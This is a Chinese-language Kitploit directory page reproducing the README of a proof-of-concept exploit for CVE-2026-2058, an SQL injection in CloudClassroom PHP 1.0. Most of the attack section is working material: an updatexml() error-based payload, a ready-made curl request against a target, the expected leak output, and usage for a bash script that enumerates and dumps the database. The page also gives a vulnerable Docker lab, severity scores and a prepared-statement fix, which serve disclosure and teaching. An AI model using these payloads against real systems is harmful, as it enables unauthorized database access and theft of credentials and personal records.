Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2058-PoC — CVE-2026-2058 的概念验证漏洞利用程序,针对 CloudClassroom PHP 项目中的 SQL 注入漏洞,具备自动化数据库枚举与数据提取功能。 | Kitploit
工具/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

CVE-2026-2058 的概念验证漏洞利用程序,针对 CloudClassroom PHP 项目中的 SQL 注入漏洞,具备自动化数据库枚举与数据提取功能。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-2058-PoC – CloudClassroom PHP 项目 SQL 注入

概述

CloudClassroom PHP 项目 (v1.0) 的 Post Query 功能中存在一个 SQL 注入漏洞。

该漏洞允许攻击者通过 squeryx POST 参数注入任意 SQL 命令,从而导致数据库枚举和数据窃取。

本仓库包含一个 概念验证 (PoC) 漏洞利用程序,演示了如何利用该漏洞从后端数据库中窃取敏感数据。


漏洞信息

字段值
CVECVE-2026-2058
漏洞类型SQL 注入
CWECWE-89
受影响软件CloudClassroom PHP 项目
受影响版本1.0
组件Post Query 功能
攻击向量远程
是否需要认证否
影响数据库泄露
严重程度高
攻击模式参考CAPEC-66

易受攻击的端点

root@kitploit:~
POST /postquerypublic

易受攻击的参数

root@kitploit:~
squeryx

根本原因

后端代码直接将用户输入拼接进 SQL 查询,而没有进行适当的清理或使用参数化查询。

易受攻击的代码示例:

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

由于 $tempsquery 来源于用户输入,攻击者可以注入任意 SQL。


易受攻击的实验环境 (Docker)

出于测试和研究目的,提供了一个易受攻击的 Docker 环境。

运行易受攻击的应用程序

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

概念验证

该漏洞可通过利用 MySQL updatexml() 函数的基于报错的 SQL 注入技术来触发。

示例载荷:

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

手动利用

示例 curl 请求:

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

预期响应:

root@kitploit:~
XPATH syntax error: '~cc_db~'

漏洞利用脚本

本仓库包含一个 bash 漏洞利用脚本,可自动:

  • 提取数据库名称
  • 枚举数据表
  • 枚举数据列
  • 转储表数据

使用方法

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

示例:

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

影响

攻击者可以:

  • 枚举数据库结构
  • 窃取敏感数据
  • 获取管理员凭据
  • 访问学生记录
  • 完全攻陷后端数据库

CVSS 评分

NIST NVD

  • 基础评分:9.8 (严重)
  • 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • 基础评分:7.3 (高危)
  • 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ 注意:由于影响评估不同,NVD 的 CVSS 评分与 CNA (VulDB) 的评分存在差异。


EPSS (漏洞利用预测评分系统)

漏洞利用预测评分系统 (EPSS) 用于估算漏洞在现实环境中被利用的概率。

CVEEPSS 概率百分位日期
CVE-2026-20580.000287.62 %2026-03-01

来源:FIRST EPSS 数据集


缓解措施

开发人员应:

  • 使用预编译语句
  • 实施输入验证
  • 正确转义用户输入
  • 应用最小权限数据库权限

安全实现示例:

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

截图

SQL 注入利用

image

image

参考

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

免责声明

此漏洞利用程序仅供教育和研究目的使用。

作者对因使用此代码而造成的滥用或损害概不负责。


作者

bl4dsc4n

安全研究员

下载工具